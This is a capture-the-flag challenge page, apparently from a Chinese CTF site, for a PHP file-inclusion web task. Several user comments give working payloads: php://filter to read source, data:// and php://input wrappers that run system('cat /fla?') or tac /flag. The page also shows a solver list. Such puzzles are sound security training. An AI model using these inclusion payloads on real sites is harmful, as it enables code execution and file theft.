简单的IncludeWEB 未解决

分数: 15 金币: 2
题目作者: hanzkj
一  血: flagOrz
一血奖励: 2金币
解  决: 260
提  示:
描  述:

听说你很会读文件?我把门(目录遍历)焊死了,窗户(关键词过滤)也封了。笔给你,你来写(payload)。

评论
kitniu 13天前

1.IP/?page=php://filter/read=convert.base64-encode/resource=index.php 2.IP/?page=data://text/plain,%3C?php%20system(%27cat%20/fla?%27)?%3E

回复 1

网恋秀牛子被录屏导致自卑 3月前

/?page=data://text/plain,<?=exec("cat /fla?")?>

回复 0

shrinp 3月前

php://filter/convert.base64-encode/resource获取源码-》查看WAF细节-》使用data://text/plain, <?php 你需要的命令?>即可

回复 0

yinghui130 4月前

POST /?page=php://input HTTP/1.1 <br> Host: 171.80.2.169:15133 <br> <br> <?php system('tac /flag ');?>

回复 1
网恋秀牛子被录屏导致自卑 3月前

@111222 这不是实体编码,是bugku不让发尖括号之类的符号,自动把评论替换成实体编码了

回复 0

111222 4月前

谢谢你的思路,不过我用burp试了一下这里不用实体编码似乎也可以过

回复 0

Jazz888 4月前

flag{**********}

回复 0

wywitkey 5月前

解题思路是伪协议,先期php://filter/读源码,后期data://text/plain,读flag

回复 0

WriteUp

image
gxnb123

3 金币

评分(0)

暂无评分

解题动态

Ai1uro. 攻破了该题 5小时前
男小孩 攻破了该题 9小时前
sanxiu 攻破了该题 14小时前
jsbba 攻破了该题 1天前
BLCAKHUANG 攻破了该题 1天前
LUruan 攻破了该题 2天前
zaq123456 攻破了该题 2天前
finsh 攻破了该题 3天前
十里故清云 攻破了该题 3天前
Camillo 攻破了该题 3天前
rka 攻破了该题 3天前
liul6 攻破了该题 3天前
kele678 攻破了该题 3天前
cynn 攻破了该题 3天前
香芋 攻破了该题 3天前
cdlf15 攻破了该题 3天前
星泽ik 攻破了该题 3天前
G1 攻破了该题 3天前
wlssg 攻破了该题 3天前
不吃鱼hong 攻破了该题 3天前
问题反馈